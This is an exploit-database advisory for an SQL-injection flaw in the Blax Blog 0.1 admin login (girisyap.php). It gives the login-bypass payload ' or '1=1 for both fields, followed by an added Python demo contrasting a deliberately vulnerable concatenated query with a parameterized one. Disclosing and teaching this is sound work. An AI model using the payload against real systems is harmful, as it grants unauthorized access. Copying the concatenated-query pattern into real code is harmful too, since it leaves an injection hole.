Blax Blog 0.1 - girisyap.php SQL Injection

2010-03-01T00:00:00
ID EXPLOITPACK:BF4ECC84E400E569C4E5A8681AFF847E
Type exploitpack
Reporter cr4wl3r
Modified 2010-03-01T00:00:00

Description

Source: https://www.securityfocus.com/bid/38465/info

Blax Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Blax Blog 0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/admin/girisyap.php

Username: ' or '1=1
Password: ' or '1=1
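
Why the input above defeats a login check built by string concatenation, and how a parameterized query stops it. This is an added example, not code from the advisory or from Blax Blog. The query shape, the `admins` table and its columns are assumptions, and SQLite stands in for the application's database, which the page does not name.

```python
import sqlite3

def make_db():
    """In-memory database with one constructed account (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; store a hash in practice.
    db.execute("INSERT INTO admins VALUES ('admin', 'S3cret-constructed')")
    return db

def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: user input is pasted into the SQL text."""
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return sql, db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    """Hardened form: placeholders keep input as data, never as SQL syntax."""
    sql = "SELECT username FROM admins WHERE username = ? AND password = ?"
    return sql, db.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    value = "' or '1=1"  # the input quoted in the advisory
    for check in (login_concatenated, login_parameterized):
        sql, accepted = check(db, value, value)
        # The concatenated WHERE clause ends in: ... password = '' or '1=1'
        # so the trailing OR term is true for every row.
        print(f"{check.__name__}: accepted={accepted}\n  {sql}")
```
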